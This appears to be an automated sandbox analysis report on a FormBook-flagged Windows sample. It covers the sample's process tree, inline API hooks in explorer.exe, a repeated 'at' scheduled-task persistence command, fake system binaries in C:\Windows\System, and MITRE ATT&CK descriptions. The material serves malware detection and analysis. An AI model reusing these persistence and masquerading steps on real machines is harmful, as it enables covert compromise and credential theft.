68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xED
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xED
GetMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xED
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xED

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: os9TZxfmTZ.exe PID: 6248 Parent PID: 5740

General

Start time:	08:58:59
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\os9TZxfmTZ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\os9TZxfmTZ.exe'
Imagebase:	0x400000
File size:	379720 bytes
MD5 hash:	AD0C93B574BB947CFF15483EDA82811E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: os9tzxfmtz.exe PID: 6280 Parent PID: 6248

General

Start time:	08:58:59
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\os9tzxfmtz.exe
Wow64 process (32bit):	true
Commandline:	c:\users\user\desktop\os9tzxfmtz.exe
Imagebase:	0x400000
File size:	167936 bytes
MD5 hash:	ABBFBEC83B67CA488DF807F74D5773B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low

Analysis Process: icsys.icn.exe PID: 6336 Parent PID: 6248

General

Start time:	08:59:10
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\icsys.icn.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\icsys.icn.exe
Imagebase:	0x400000
File size:	211759 bytes
MD5 hash:	D5809935B2F8A4579AAADCA96C2920EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: explorer.exe PID: 6384 Parent PID: 6336

General

Start time:	08:59:11
Start date:	12/04/2021
Path:	C:\Windows\System\explorer.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\explorer.exe
Imagebase:	0x400000
File size:	211802 bytes
MD5 hash:	0CE3C90CA3FCFCD7C234D580BF184F0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: spoolsv.exe PID: 6408 Parent PID: 6384

General

Start time:	08:59:12
Start date:	12/04/2021
Path:	C:\Windows\System\spoolsv.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\spoolsv.exe SE
Imagebase:	0x400000
File size:	211955 bytes
MD5 hash:	299A35006AE04B5DD9C7BC9D0B30CA9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: svchost.exe PID: 6440 Parent PID: 6408

General

Start time:	08:59:12
Start date:	12/04/2021
Path:	C:\Windows\System\svchost.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\svchost.exe
Imagebase:	0x400000
File size:	211825 bytes
MD5 hash:	7718CCEC6D9968F3EFF22F24955DFD38
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: svchost.exe PID: 6616 Parent PID: 556

General

Start time:	08:59:14
Start date:	12/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: spoolsv.exe PID: 6632 Parent PID: 6440

General

Start time:	08:59:15
Start date:	12/04/2021
Path:	C:\Windows\System\spoolsv.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\spoolsv.exe PR
Imagebase:	0x7ff797770000
File size:	211955 bytes
MD5 hash:	299A35006AE04B5DD9C7BC9D0B30CA9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: at.exe PID: 6752 Parent PID: 6440

General

Start time:	08:59:18
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 6768 Parent PID: 6752

General

Start time:	08:59:18
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: at.exe PID: 6820 Parent PID: 6440

General

Start time:	08:59:20
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 6828 Parent PID: 6820

General

Start time:	08:59:20
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: at.exe PID: 6836 Parent PID: 6440

General

Start time:	08:59:20
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 6900 Parent PID: 6836

General

Start time:	08:59:21
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: at.exe PID: 6916 Parent PID: 6440

General

Start time:	08:59:21
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 6940 Parent PID: 6916

General

Start time:	08:59:21
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: at.exe PID: 6960 Parent PID: 6440

General

Start time:	08:59:22
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7012 Parent PID: 6960

General

Start time:	08:59:22
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 7020 Parent PID: 6440

General

Start time:	08:59:22
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7028 Parent PID: 7020

General

Start time:	08:59:23
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 7036 Parent PID: 6440

General

Start time:	08:59:23
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7072 Parent PID: 7036

General

Start time:	08:59:23
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 7080 Parent PID: 6440

General

Start time:	08:59:23
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 7112 Parent PID: 7080

General

Start time:	08:59:24
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 7152 Parent PID: 556

General

Start time:	08:59:24
Start date:	12/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 7160 Parent PID: 6440

General

Start time:	08:59:24
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5988 Parent PID: 7160

General

Start time:	08:59:25
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff797770000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: os9tzxfmtz.exe PID: 6328 Parent PID: 6280

General

Start time:	08:59:25
Start date:	12/04/2021
Path:	C:\Users\user\Desktop\os9tzxfmtz.exe
Wow64 process (32bit):	true
Commandline:	c:\users\user\desktop\os9tzxfmtz.exe
Imagebase:	0x400000
File size:	167936 bytes
MD5 hash:	ABBFBEC83B67CA488DF807F74D5773B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

Analysis Process: at.exe PID: 3676 Parent PID: 6440

General

Start time:	08:59:25
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5896 Parent PID: 3676

General

Start time:	08:59:26
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 5904 Parent PID: 6440

General

Start time:	08:59:26
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 6128 Parent PID: 556

General

Start time:	08:59:26
Start date:	12/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 2200 Parent PID: 5904

General

Start time:	08:59:26
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 6720 Parent PID: 6440

General

Start time:	08:59:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6344 Parent PID: 6720

General

Start time:	08:59:27
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: at.exe PID: 6788 Parent PID: 6440

General

Start time:	08:59:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 09:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x40000
File size:	25088 bytes
MD5 hash:	6E495479C0213E98C8141C75807AADC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 6824 Parent PID: 3472

General

Start time:	08:59:27
Start date:	12/04/2021
Path:	C:\Windows\System\explorer.exe
Wow64 process (32bit):	true
Commandline:	'C:\windows\system\explorer.exe' RO
Imagebase:	0x400000
File size:	211802 bytes
MD5 hash:	0CE3C90CA3FCFCD7C234D580BF184F0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic

Analysis Process: svchost.exe PID: 408 Parent PID: 556

General

Start time:	08:59:27
Start date:	12/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase:	0x7ff797770000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
